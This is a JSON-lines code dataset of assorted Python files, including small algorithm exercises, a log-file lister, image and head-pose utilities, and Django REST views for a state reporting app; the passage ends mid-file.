+{"seq_id":"194005244","text":"#!-*-coding:utf-8-*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef sigmoid( x ):\n return 1 / ( 1 + np.exp( -x ) )\n\ndef sigmoid_prime( x ):\n y = sigmoid( x )\n return y * ( 1 - y )\n\nx = np.arange( -5 , 5 , 0.1 )\nplt.grid()\nplt.plot( x , sigmoid( x ) )\nplt.plot( x , sigmoid_prime( x ) , marker=\"o\" , markevery = 5 )\nplt.savefig( \"./graphs/sigmoid.png\" )\n","sub_path":"02/sigmoid.py","file_name":"sigmoid.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239814739","text":"from HashItem import HashItem\r\n\r\nclass HashTable:\r\n def __init__(self):\r\n self.size = 256\r\n self.slots = [None for i in range(self.size)]\r\n self.count = 0\r\n\r\n def _hash(self,key):\r\n mult =1\r\n hv =0\r\n for ch in key:\r\n hv+=mult*ord(ch)\r\n mult+=1\r\n return hv%self.size\r\n\r\n def put(self,key,value):\r\n item = HashItem(key,value)\r\n h = self._hash(key)\r\n\r\n while self.slots[h]:\r\n if self.slots[h].key is key:\r\n break\r\n h =(h+1)%self.size\r\n if self.slots[h] is None:\r\n self.count+=1\r\n self.slots[h]= item\r\n\r\n def get(self,key):\r\n h= self._hash(key)\r\n while self.slots[h]:\r\n if self.slots[h].key is key:\r\n return self.slots[h].value\r\n h = (h+1)%self.size\r\n return None\r\n\r\n def __getitem__(self,key):\r\n return self.get(key)\r\n","sub_path":"HashTable/HashTable.py","file_name":"HashTable.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255078270","text":"#\n# Copyright 2017 NephoScale\n#\n\n\nfrom django.conf.urls import url\nfrom astutedashboard.dashboards.billing.image_report import views\n\nurlpatterns = [\n\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^search_filter$', views.search_filter, name='search_filter'),\n url(r'^export_as_csv$', views.export_as_csv, name='export_as_csv'),\n]\n\n","sub_path":"astute-dashboard/astutedashboard/dashboards/billing/image_report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94040258","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\nclass res_users_signature(models.Model):\n _name = \"res.users.signature\"\n _description = 'User Signature' \n _order = 'company_id, id'\n \n company_id = fields.Many2one('res.company', string=\"Company\")\n signature = fields.Html(string=\"Signature\")\n user_id = fields.Many2one('res.users', string=\"User\")\n \n @api.one\n @api.constrains('company_id','user_id')\n def _check_unicity(self):\n lst = self.search([('id','!=',self.id),('company_id','=',self.company_id.id),('user_id','=',self.user_id.id)])\n if lst:\n raise ValidationError(_(\"The user already has a signature for this company\")) \n\n\nclass res_users(models.Model):\n _inherit = \"res.users\"\n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.signature_ids:\n \n for signature_id in self.signature_ids:\n if signature_id.company_id.id == self.company_id.id:\n self.signature = signature_id.signature\n break\n\n signature_ids = fields.One2many('res.users.signature', 'user_id', string=\"User Signatures\")\n ","sub_path":"users_multi_signature/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512268440","text":"class Solution:\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n\n cur = len(digits) - 1\n carry = 1\n while cur >= 0:\n tmp = digits[cur] + carry\n if tmp < 10:\n digits[cur] = tmp\n carry = 0\n else:\n digits[cur] = tmp - 10\n carry = 1\n cur -= 1\n\n if cur < 0 and carry == 1:\n digits.insert(0, carry)\n \n return digits\n\nif __name__ == '__main__':\n digits = [9, 9, 9]\n print(Solution().plusOne(digits))\n","sub_path":"leetcode/python/66_PlusOne.py","file_name":"66_PlusOne.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549593716","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\ndef fiboword(a,b,n):\n lena = len(a)\n lenb = len(b)\n digits = [lena, lenb]\n digit_range = True\n while digit_range:\n digits.append(digits[-1] + digits[-2])\n if digits[-1] >= n:\n digit_range = False\n\n while len(digits) > 3:\n if n <= digits[-3]:\n digits.pop()\n digits.pop()\n else:\n n = n-digits[-3]\n digits.pop() \n\n if len(digits) == 3:\n if n <= digits[-3]:\n return(a[n-1])\n else:\n n = n-digits[-3]\n return(b[n-1])\n else:\n return(b[n-1])\n\niters = int(input())\n\nfor iterate in range(iters):\n a,b,n = input().strip().split(' ')\n n = int(n)\n answer = fiboword(a,b,n)\n print(answer)\n","sub_path":"230.py","file_name":"230.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"113740005","text":"#!/usr/bin/env python3\nimport sys\nimport time\nimport os\n\ndir_exists = lambda directory: True if os.path.exists(directory) else False\n\n\ndef harvester(directory):\n \"\"\"\n\treturn all logs file on directory\n\t\"\"\"\n logs = list()\n try:\n for item in os.walk(directory):\n dirpath, dirnames, filenames = item\n\n # check every filenames in dirpath\n for file in filenames:\n root, ext = os.path.splitext(file)\n\n if ext == \".log\":\n logs.append(os.path.join(dirpath, file))\n except KeyboardInterrupt:\n print(\"[*] Aborting ...\")\n time.sleep(1)\n return logs\n return logs\n\n\ndef usage():\n print(\" Logs files Harvester : logs_harvester.py\")\n\n print(\"\\n usage : sudo python3 logs_harvester.py dir1 dir2 dir3 ...\\n\")\n exit()\n\n\ndef main(dirs):\n\n directories = list()\n logs = list()\n\n # check if all directories exists\n for directory in dirs:\n if not dir_exists(directory):\n print(\"[-] {} Not Found.(Exluded)\".format(directory))\n else:\n directories.append(directory)\n\n if not len(directories):\n print(\"[-] No directory Exists. 
Aborting ...\")\n exit()\n\n # walk through directories\n for directory in directories:\n print(\"[*] Processing {} ...\".format(directory))\n logs += harvester(directory)\n time.sleep(1)\n\n # display logs\n print(\"[+] Found {} log file\".format(len(logs)))\n time.sleep(1)\n for log in logs:\n print(\"[+] {}\".format(log))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 1:\n usage()\n\n main(sys.argv[1:])\n","sub_path":"python/logs_harvester.py","file_name":"logs_harvester.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188768839","text":"#-*- coding: UTF-8 -*-\nimport json\nimport os\nimport sys\n__root_dir = os.path.abspath(os.path.dirname(__file__))\n__root_dir = os.path.abspath(os.path.join(__root_dir, '..'))\nos.environ['ET_INSTALLED_DIR'] = __root_dir\nsys.path.insert(0, __root_dir)\negg_path = os.path.join(__root_dir, 'utlis')\nsys.path.insert(0, egg_path)\nsys.path.insert(0, \"D:\\project\\python\\interfaceTest\\Lib\\site-packages\")\nimport ddt\nimport unittest\n\nfrom utlis.read_res.ReadExec import Read_exec\nfrom utlis.read_res.ReadIni import read_ini\nfrom utlis.read_res.GetKeyValue import GetKeyValue\nfrom utlis.handle_results import handle_results\nfrom utlis.handlle_json import handle_json\nfrom utlis.handle_cookie import handle_cookie\nfrom common.BaseRequest import base_request\n\n\n\n\ndata = Read_exec(file_name=\"聚合\").get_all_lines()\nimooc_host = read_ini.get_content(\"server\",\"juhe_host\")\n\n@ddt.ddt\nclass TestImooc(unittest.TestCase):\n\n\n @ddt.data(*data)\n def test_sugrec(self,data):\n cookie=None\n get_cookie=None\n headers=None\n test_id,environment,role,is_perform,condition,url,method,data_json,cookie_perform,header_perform,check_field,check_value=data\n if is_perform==\"yes\":\n if cookie_perform == \"yes\":\n cookie = handle_cookie.get_cookie_value(environment)\n elif cookie_perform== \"write\":\n get_cookie = {\"is_cookie\":environment}\n if header_perform==\"yes\":\n headers = handle_json.get_data_value(\"config/header.json\",environment)\n res =base_request.send_request(method,imooc_host+url,json.loads(data_json),cookie=cookie,get_cookie=get_cookie,header=headers)\n\n print(\"res=============>\",res)\n cf_list = handle_results.get_ec_field(check_field)\n cv_list = handle_results.get_ec_field(check_value)\n for i in range(len(cf_list)):\n if cf_list[i]=='json':\n load_data = handle_json.read_json(\"config/user_data.json\").get(url)\n json_check_results= handle_json.check_json_format(load_data,json.loads(res))\n self.assertTrue(json_check_results)\n else:\n data_list = GetKeyValue(res).search_key(cf_list[i])\n self.assertTrue(data_list !=[] and data_list!=None,\"字段{0}不存在json中\".format(cf_list[i]))\n for h_data in data_list:\n\n print(cv_list[i])\n print(str(h_data))\n self.assertEqual(str(h_data), cv_list[i])\n\n\n\n\nif __name__ == '__main__':\n\n\n unittest.main()\n","sub_path":"code/case/juhe_test.py","file_name":"juhe_test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"468634894","text":"from PIL import Image\nimport numpy as np\nimport sys\nimport math\n\n\n\n\n\n#imgColor = Image.open(\"/home/david/Downloads/veloCOLOR.jpeg\")\n#print(np.array(imgColor).shape)\n\ndef check_BW(image):\n\tarray_img = np.array(image)\n\tnum_of_dimensions = len(array_img.shape)\n\ttotal_pixel = array_img.shape[0] * array_img.shape[1]\n\tif total_pixel < 
10000: \n\t\tstep_i = 1\n\t\tstep_j = 1\n\telse:\n\t\tstep_i = array_img.shape[0] // 100\n\t\tstep_j = array_img.shape[1] // 100\n\tif num_of_dimensions < 3:\n\t\treturn True\n\tBW_pixel = 0\n\tcount = 0\n\tfor i in range(0, array_img.shape[0], step_i):\n\t\tfor j in range(0, array_img.shape[1], step_j):\n\t\t\tpixel = array_img[i,j]\n\t\t\tavg = sum(pixel[0:3] / 3)\n\t\t\tcount += 1\n\t\t\tif abs(pixel[1] - avg) < 2:\n\t\t\t\tBW_pixel += 1\n\tif BW_pixel / count > 0.9:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n\ndef main():\n\timage_path = sys.argv[1]\n\ttry:\n\t\timg = Image.open(image_path)\n\texcept:\n\t\tprint(\"Black-White-Check could no read image.\")\n\t\treturn\n\tis_BW = check_BW(img)\n\tif is_BW:\n\t\tprint (\"The image is black and white...\")\n\telse:\n\t\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()\n\t","sub_path":"david/SWcheck.py","file_name":"SWcheck.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"157633966","text":"import cv2, math\nimport numpy as np\n\n# FUNCTION TO MAKE 2D IMAGE\ndef make2d(shape):\n imagePoints = [[shape.part(30).x, shape.part(30).y],\n [shape.part(8).x, shape.part(8).y],\n [shape.part(36).x, shape.part(36).y],\n [shape.part(45).x, shape.part(45).y],\n [shape.part(48).x, shape.part(48).y],\n [shape.part(54).x, shape.part(54).y]]\n return np.array(imagePoints, dtype=np.float64)\n# FUNCTION DEFINITION END \n\n# FUNCTION TO MAKE 3D MODEL POINTS\ndef make3d():\n modelPoints = [[0.0, 0.0, 0.0],\n [0.0, -330.0, -65.0],\n [-225.0, 170.0, -135.0],\n [225.0, 170.0, -135.0],\n [-150.0, -150.0, -125.0],\n [150.0, -150.0, -125.0]]\n return np.array(modelPoints, dtype=np.float64)\n# FUNCTION DEFINITION END \n\n# GETTING THE EULER ANGLES\ndef get_euler_angle(rotation_vector):\n # calculate rotation angles\n theta = cv2.norm(rotation_vector, cv2.NORM_L2)\n \n # transformed to quaterniond\n w = math.cos(theta / 2)\n x = math.sin(theta / 2)*rotation_vector[0][0] / theta\n y = math.sin(theta / 2)*rotation_vector[1][0] / theta\n z = math.sin(theta / 2)*rotation_vector[2][0] / theta\n \n ysqr = y * y\n # pitch (x-axis rotation)\n t0 = 2.0 * (w * x + y * z)\n t1 = 1.0 - 2.0 * (x * x + ysqr)\n # print('t0:{}, t1:{}'.format(t0, t1))\n pitch = math.atan2(t0, t1)\n \n # yaw (y-axis rotation)\n t2 = 2.0 * (w * y - z * x)\n if t2 > 1.0:\n t2 = 1.0\n if t2 < -1.0:\n t2 = -1.0\n yaw = math.asin(t2)\n \n # roll (z-axis rotation)\n t3 = 2.0 * (w * z + x * y)\n t4 = 1.0 - 2.0 * (ysqr + z * z)\n roll = math.atan2(t3, t4)\n \n # print('pitch:{}, yaw:{}, roll:{}'.format(pitch, yaw, roll))\n \n\t # Unit conversion: convert radians to degrees\n Y = int((pitch/math.pi)*180)\n X = int((yaw/math.pi)*180)\n Z = int((roll/math.pi)*180)\n \n return 0, Y, X, Z\n#FUNCTION DEFINITION END\n\n# CHOOSING THE LARGEST FACE\ndef faceIndex(rects):\n if len(rects)==1:\n return 0\n elif len(rects)==0:\n return -1\n area=((rect.right()-rect.left())*(rect.bottom()-rect.top()) for rect in rects)\n area=list(area)\n maxIndex=0\n maximum=area[0]\n for i in range(1,len(area)):\n if (area[i]>maximum):\n maxIndex=i\n maximum=area[i]\n return maxIndex\n#FUNCTION DEFINITION END\n","sub_path":"SocketTesting/EulerAng.py","file_name":"EulerAng.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"235054478","text":"import json\nimport string\nfrom typing import (\n Dict,\n List,\n Union,\n)\n\nfrom datetime 
import datetime\nfrom django.contrib.auth.models import User, Group # type: ignore\nfrom django.db import transaction # type: ignore\nfrom django.http import HttpResponse # type: ignore\nfrom django.template.loader import get_template # type: ignore\nfrom django.utils import timezone # type: ignore\nfrom jsonpath_ng.ext import parse # type: ignore\nfrom jsonpath_ng import DatumInContext # type: ignore\nfrom rest_framework import viewsets # type: ignore\nfrom rest_framework.decorators import ( # type: ignore\n api_view,\n)\nfrom rest_framework.exceptions import ( # type: ignore\n PermissionDenied,\n ValidationError,\n)\nfrom rest_framework.response import Response # type: ignore\nfrom rest_framework.permissions import ( # type: ignore\n IsAuthenticated,\n IsAuthenticatedOrReadOnly,\n AllowAny,\n)\nfrom carts.auth_dev import JwtDevAuthentication\nfrom carts.permissions import (\n AdminHideRoleFromUsername,\n AdminHideRoleFromJobCode,\n AdminHideRolesFromJobCode,\n AdminHideStatesFromUsername,\n StateChangeSectionPermission,\n StateViewSectionPermission,\n)\nfrom carts.carts_api.serializers import (\n UserSerializer,\n GroupSerializer,\n RoleFromUsernameSerializer,\n RoleFromJobCodeSerializer,\n RolesFromJobCodeSerializer,\n SectionSerializer,\n SectionBaseSerializer,\n SectionSchemaSerializer,\n StateSerializer,\n StateStatusSerializer,\n StatesFromUsernameSerializer,\n)\nfrom carts.carts_api.models import (\n RoleFromUsername,\n RoleFromJobCode,\n RolesFromJobCode,\n Section,\n SectionBase,\n SectionSchema,\n State,\n StateStatus,\n StatesFromUsername,\n UserProfiles,\n)\nfrom carts.carts_api.model_utils import validate_status_change\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\n# TODO: This should be absolutely stored elswhere.\nSTATE_INFO = {\n \"AK\": {\"program_type\": \"medicaid_exp_chip\"},\n \"AZ\": {\"program_type\": \"separate_chip\"},\n \"MA\": {\"program_type\": \"combo\"},\n}\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all().order_by(\"-date_joined\")\n serializer_class = UserSerializer\n\n\n@api_view([\"POST\"])\ndef UserProfilesViewSet(request):\n \"\"\"\n API endpoint that returns all user profile data.\n \"\"\"\n\n # Get all users\n users = list(UserProfiles.objects.all().order_by(\"username\").values())\n\n return HttpResponse(json.dumps(users, cls=DjangoJSONEncoder))\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticated]\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass StateViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that returns state data.\n \"\"\"\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = State.objects.all()\n serializer_class = StateSerializer\n\n # def list(self, request):\n # return Response(self.serializer_class(self.queryset).data)\n\n\nclass StatesFromUsernameViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideStatesFromUsername]\n queryset = StatesFromUsername.objects.all()\n serializer_class = StatesFromUsernameSerializer\n\n def create(self, request):\n # We want there only to be one entry per username, and for the new\n # 
entry to overwrite.\n username = request.data.get(\"username\")\n existing = StatesFromUsername.objects.filter(username=username)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RoleFromUsernameViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRoleFromUsername]\n queryset = RoleFromUsername.objects.all()\n serializer_class = RoleFromUsernameSerializer\n\n def create(self, request):\n # We want there only to be one entry per username, and for the new\n # entry to overwrite.\n username = request.data.get(\"username\")\n existing = RoleFromUsername.objects.filter(username=username)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RoleFromJobCodeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRoleFromJobCode]\n queryset = RoleFromJobCode.objects.all()\n serializer_class = RoleFromJobCodeSerializer\n\n def create(self, request):\n # We want there only to be one entry per job code, and for the new\n # entry to overwrite.\n job_code = request.data.get(\"job_code\")\n existing = RoleFromJobCode.objects.filter(job_code=job_code)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass RolesFromJobCodeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for username–state associations.\n \"\"\"\n\n permission_classes = [AdminHideRolesFromJobCode]\n queryset = RolesFromJobCode.objects.all()\n serializer_class = RolesFromJobCodeSerializer\n\n def create(self, request):\n # We want there only to be one entry per job code, and for the new\n # entry to overwrite.\n job_code = request.data.get(\"job_code\")\n existing = RolesFromJobCode.objects.filter(job_code=job_code)\n for relation in existing:\n relation.delete()\n return super().create(request)\n\n\nclass StateStatusViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for state status.\n \"\"\"\n\n permission_classes = [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ]\n queryset = StateStatus.objects.all()\n serializer_class = StateStatusSerializer\n\n def create(self, request):\n \"\"\"\n The object being created here is the newest status for a given\n state/year.\n We expect the post request to have state, year, and status; we get the\n user from request.user and we update last_changed ourselves.\n\n We've had some confusion over whether or not the name for a form in\n progress is \"in progress\" or \"started\", so we accommodate both below\n and turn the latter into the former.\n\n \"\"\"\n state_code = request.data.get(\"state\")\n year = request.data.get(\"year\")\n new_status = request.data.get(\"status\")\n if new_status == \"started\":\n new_status = \"in_progress\"\n user = request.user\n try:\n assert all([state_code, year, new_status, user])\n except AssertionError:\n return HttpResponse(\n \"state_code, year, status, or user missing\", status=400\n )\n state = State.objects.get(code=state_code.upper())\n current = (\n StateStatus.objects.all()\n .filter(state_id=state_code.upper(), year=year)\n .order_by(\"last_changed\")\n .last()\n )\n current_status = current.status if current else \"not_started\"\n if current_status == new_status:\n return self.list(request)\n if current_status == \"started\":\n current_status = \"in_progress\"\n is_change_valid = validate_status_change(\n user.appuser.role, current_status, new_status\n )\n if 
is_change_valid.update_success:\n updated = StateStatus.objects.create(\n state=state,\n year=year,\n status=is_change_valid.new_status,\n last_changed=datetime.now(tz=timezone.utc),\n user_name=user.username,\n )\n updated.save()\n \"\"\"\n The \"submitted\" state is transitory and we should probably get rid\n of it, but while it exists, it exists only to be immediately turned\n into \"certified\":\n \"\"\"\n if updated.status == \"submitted\":\n certified = StateStatus.objects.create(\n state=state,\n year=year,\n status=\"certified\",\n last_changed=datetime.now(tz=timezone.utc),\n user_name=user.username,\n )\n certified.save()\n\n return self.list(request)\n\n return HttpResponse(is_change_valid.message, status=400)\n\n def get_queryset(self):\n user = self.request.user\n if user.appuser.role == \"state_user\":\n state = user.appuser.states.all()[0]\n return StateStatus.objects.filter(state=state)\n elif user.appuser.role in (\"bus_user\", \"co_user\"):\n return StateStatus.objects.all()\n\n\nclass SectionViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n queryset = Section.objects.all()\n serializer_class = SectionSerializer\n permission_classes = [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ]\n\n def list(self, request):\n queryset = self.get_queryset()\n serializer = SectionSerializer(\n queryset, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n def get_sections_by_year_and_state(self, request, year, state):\n sections = self.get_queryset().filter(\n contents__section__year=year,\n contents__section__state=state.upper(),\n )\n\n for section in sections:\n # TODO: streamline this so if users have access to all of the\n # objects (e.g. 
if they're admins) the check occurs ony once.\n print(\"about to check object permissions\", flush=True)\n self.check_object_permissions(request, section)\n\n serializer = SectionSerializer(\n sections, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n def get_section_by_year_and_state(self, request, year, state, section):\n section = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n\n self.check_object_permissions(request, section)\n\n serializer = SectionSerializer(section, context={\"request\": request})\n return Response(serializer.data)\n\n transaction.atomic\n\n def update_sections(self, request):\n try:\n state_id = False\n year = False\n\n for entry in request.data:\n section_id = entry[\"contents\"][\"section\"][\"id\"]\n section_state = entry[\"contents\"][\"section\"][\"state\"]\n state_id = section_state.upper()\n year = entry[\"contents\"][\"section\"][\"year\"]\n\n section = Section.objects.get(\n contents__section__id=section_id,\n contents__section__state=section_state.upper(),\n )\n\n self.check_object_permissions(request, section)\n\n status = (\n StateStatus.objects.all()\n .filter(state_id=state_id, year=year)\n .order_by(\"last_changed\")\n .last()\n )\n can_save = status is None or status.status not in [\n \"certified\",\n \"published\",\n \"approved\",\n ]\n\n if request.user.appuser.role != \"state_user\":\n can_save = False\n\n if not can_save:\n return HttpResponse(\n f\"cannot save {status} report\", status=400\n )\n\n section.contents = entry[\"contents\"]\n section.save()\n\n status = (\n StateStatus.objects.all()\n .filter(state_id=section_state, year=year)\n .order_by(\"last_changed\")\n .last()\n )\n\n if status.status == \"in_progress\":\n status.last_changed = datetime.now(tz=timezone.utc)\n status.save()\n else:\n # if the form is being changed, it must be in progress:\n state = State.objects.get(code=section_state.upper())\n updated = StateStatus.objects.create(\n state=state,\n year=year,\n status=\"in_progress\",\n last_changed=datetime.now(tz=timezone.utc),\n user_name=request.user.username,\n )\n updated.save()\n\n return HttpResponse(status=204)\n\n except PermissionDenied:\n raise\n except Exception as e:\n raise ValidationError(\n \"There is a problem with the provided data.\", 400\n ) from e\n\n def get_permissions(self):\n permission_classes_by_action = {\n \"get_sections_by_year_and_state\": [StateViewSectionPermission],\n \"get_section_by_year_and_state\": [StateViewSectionPermission],\n \"update_sections\": [\n StateViewSectionPermission,\n StateChangeSectionPermission,\n ],\n }\n\n try:\n return [\n permission()\n for permission in permission_classes_by_action[self.action]\n ]\n except:\n return [permission() for permission in self.permission_classes]\n\n\n@api_view([\"GET\"])\ndef section_by_year_and_state(request, year, state, section):\n try:\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbases_by_year(request, year):\n try:\n data = SectionBase.objects.filter(contents__section__year=year)\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = 
SectionBaseSerializer(\n data, many=True, context={\"request\": request}\n )\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbase_by_year_and_section(request, year, section):\n try:\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef sectionbase_by_year_section_subsection(request, year, section, subsection):\n try:\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n subsection_id = _id_from_chunks(year, section, subsection)\n subsections = data.contents[\"section\"][\"subsections\"]\n targets = [_ for _ in subsections if _[\"id\"] == subsection_id]\n if not targets:\n return HttpResponse(status=404)\n data.contents = targets[0] if len(targets) == 1 else targets\n\n except SectionBase.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef section_subsection_by_year_and_state(\n request, year, state, section, subsection\n):\n try:\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n subsections = data.contents[\"section\"][\"subsections\"]\n subsection_id = _id_from_chunks(year, section, subsection)\n targets = [_ for _ in subsections if _[\"id\"] == subsection_id]\n if not targets:\n return HttpResponse(status=404)\n data.contents = targets[0] if len(targets) == 1 else targets\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef fragment_by_year_state_id(request, state, id):\n try:\n year, section = _year_section_query_from_id(id)\n data = Section.objects.get(\n contents__section__year=year,\n contents__section__state=state.upper(),\n contents__section__ordinal=section,\n )\n targets = _get_fragment_by_id(id, data.contents.get(\"section\"))\n if not len(targets) == 1:\n return HttpResponse(status=404)\n data.contents = targets[0].value\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionSerializer(data)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef generic_fragment_by_id(request, id):\n try:\n year, section = _year_section_query_from_id(id)\n data = SectionBase.objects.get(\n contents__section__year=year, contents__section__ordinal=section\n )\n targets = _get_fragment_by_id(id, data.contents.get(\"section\"))\n if not len(targets) == 1:\n return HttpResponse(status=404)\n data.contents = targets[0].value\n\n except Section.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == \"GET\":\n serializer = SectionBaseSerializer(data)\n return Response(serializer.data)\n\n\nclass SectionBaseViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = SectionBase.objects.all()\n serializer_class = SectionBaseSerializer\n\n\nclass SectionSchemaViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n 
permission_classes = [IsAuthenticatedOrReadOnly]\n queryset = SectionSchema.objects.all()\n serializer_class = SectionSchemaSerializer\n\n\ndef report(request, year=None, state=None):\n assert year\n assert state\n sections = Section.objects.filter(\n contents__section__year=year, contents__section__state=state.upper()\n )\n ordered = sorted(\n [_.contents[\"section\"] for _ in sections], key=lambda s: s[\"ordinal\"]\n )\n context = {\n \"sections\": ordered,\n \"state\": STATE_INFO[state.upper()],\n \"l\": len(ordered),\n }\n report_template = get_template(\"report.html\")\n return HttpResponse(report_template.render(context=context))\n\n\n@api_view([\"POST\"])\ndef UserActivateViewSet(request, user=None):\n # Get user\n current = User.objects.get(username=user)\n current.is_active = True\n current.save()\n\n return HttpResponse(\"Activated User\")\n\n\n@api_view([\"POST\"])\ndef UserDeactivateViewSet(request, user=None):\n # Get user\n current = User.objects.get(username=user)\n current.is_active = False\n current.save()\n\n return HttpResponse(\"Deactivated User\")\n\n\ndef fake_user_data(request, username=None): # pylint: disable=unused-argument\n jwt_auth = JwtDevAuthentication()\n user, _ = jwt_auth.authenticate(request, username=username)\n state = user.appuser.states.all()[0] if user.appuser.states.all() else []\n groups = \", \".join(user.groups.all().values_list(\"name\", flat=True))\n\n program_names = \", \".join(state.program_names) if state else None\n program_text = f\"{state.code.upper} {program_names}\" if state else None\n\n user_data = {\n \"name\": state.name if state else None,\n \"abbr\": state.code.upper() if state else None,\n \"programType\": state.program_type if state else None,\n \"programName\": program_text,\n \"formName\": \"CARTS FY\",\n \"currentUser\": {\n \"role\": user.appuser.role,\n \"firstname\": user.first_name,\n \"lastname\": user.last_name,\n \"state\": {\n \"id\": state.code.upper() if state else None,\n \"name\": state.name if state else None,\n },\n \"username\": user.username,\n \"email\": user.email,\n \"group\": groups,\n },\n }\n\n return HttpResponse(json.dumps(user_data))\n\n\n@csrf_exempt\n@ensure_csrf_cookie\ndef initiate_session(request):\n print(f\"\\n\\n\\n!!!!!!!!!!!!!!!initiating session\")\n resultJson = {\"transaction_result\": \"success\"}\n\n return HttpResponse(json.dumps(resultJson))\n\n\n@api_view([\"POST\"])\ndef authenticate_user(request):\n user = 